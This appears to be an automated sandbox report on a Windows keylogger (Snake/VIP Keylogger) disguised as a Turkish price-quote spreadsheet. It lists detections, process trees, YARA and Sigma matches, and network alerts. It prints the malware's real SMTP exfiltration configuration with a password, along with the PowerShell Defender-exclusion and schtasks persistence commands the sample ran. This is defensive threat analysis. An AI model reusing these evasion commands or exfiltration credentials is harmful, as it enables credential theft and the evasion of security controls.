Edit tour

Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Sample name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe renamed because original name is a hash value
Original sample name:	TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Analysis ID:	1519242
MD5:	2f7386b9d0023122e2499bc02fca0e5a
SHA1:	2d19fbf3aff8726f81ee3cdd27ce338cf36db816
SHA256:	a0a21dd376537c79ac0be99488eef94cf21475cd98de2c6cee0094a8fd52cdc0
Tags:	exeuser-lowmal3
Infos:

Detection

MassLogger RAT, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe (PID: 5664 cmdline: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" MD5: 2F7386B9D0023122E2499BC02FCA0E5A)

powershell.exe (PID: 3220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7188 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" MD5: 2F7386B9D0023122E2499BC02FCA0E5A)

OnCgVRIhY.exe (PID: 7472 cmdline: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe MD5: 2F7386B9D0023122E2499BC02FCA0E5A)

schtasks.exe (PID: 7676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

OnCgVRIhY.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe" MD5: 2F7386B9D0023122E2499BC02FCA0E5A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.4512207120.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.4514569706.000000000314B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4512203022.0000000000439000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.4515102020.000000000306E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbe298:$a1: get_encryptedPassword 0x1012b8:$a1: get_encryptedPassword 0x1440d8:$a1: get_encryptedPassword 0xbe820:$a2: get_encryptedUsername 0x101840:$a2: get_encryptedUsername 0x144660:$a2: get_encryptedUsername 0xbdf0b:$a3: get_timePasswordChanged 0x100f2b:$a3: get_timePasswordChanged 0x143d4b:$a3: get_timePasswordChanged 0xbe022:$a4: get_passwordField 0x101042:$a4: get_passwordField 0x143e62:$a4: get_passwordField 0xbe2ae:$a5: set_encryptedPassword 0x1012ce:$a5: set_encryptedPassword 0x1440ee:$a5: set_encryptedPassword 0xc0fca:$a6: get_passwords 0x103fea:$a6: get_passwords 0x146e0a:$a6: get_passwords 0xc135e:$a7: get_logins 0x10437e:$a7: get_logins 0x14719e:$a7: get_logins
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7693:$a1: get_encryptedPassword 0x7c11:$a2: get_encryptedUsername 0x7315:$a3: get_timePasswordChanged 0x742c:$a4: get_passwordField 0x76a9:$a5: set_encryptedPassword 0xa36d:$a6: get_passwords 0xa6fd:$a7: get_logins 0xa359:$a8: GetOutlookPasswords 0x9d12:$a9: StartKeylogger 0xa656:$a10: KeyLoggerEventArgs 0x9db2:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7360	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7360	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: OnCgVRIhY.exe PID: 7472	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: OnCgVRIhY.exe PID: 7732	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: OnCgVRIhY.exe PID: 7732	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: OnCgVRIhY.exe PID: 7732	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a951:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abae:$a4: \Orbitum\User Data\Default\Login Data 0x3b58d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b51:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dae:$a4: \Orbitum\User Data\Default\Login Data 0x3978d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b51:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dae:$a4: \Orbitum\User Data\Default\Login Data 0x3978d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 5664, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ProcessId: 3220, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe, ParentImage: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe, ParentProcessId: 7472, ParentProcessName: OnCgVRIhY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp", ProcessId: 7676, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 5664, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp", ProcessId: 7188, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 5664, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ProcessId: 3220, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 5664, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp", ProcessId: 7188, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:00:20.311048+0200	2803305	3	Unknown Traffic	192.168.2.5	49716	188.114.96.3	443	TCP
2024-09-26T09:00:28.659896+0200	2803305	3	Unknown Traffic	192.168.2.5	49726	188.114.96.3	443	TCP
2024-09-26T09:00:35.797526+0200	2803305	3	Unknown Traffic	192.168.2.5	49736	188.114.96.3	443	TCP
2024-09-26T09:00:44.005224+0200	2803305	3	Unknown Traffic	192.168.2.5	49745	188.114.96.3	443	TCP
2024-09-26T09:00:45.502345+0200	2803305	3	Unknown Traffic	192.168.2.5	49747	188.114.96.3	443	TCP
2024-09-26T09:00:47.551763+0200	2803305	3	Unknown Traffic	192.168.2.5	49749	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:00:18.715898+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	132.226.8.169	80	TCP
2024-09-26T09:00:19.731471+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	132.226.8.169	80	TCP
2024-09-26T09:00:21.309584+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49718	132.226.8.169	80	TCP
2024-09-26T09:00:23.934679+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49721	132.226.8.169	80	TCP
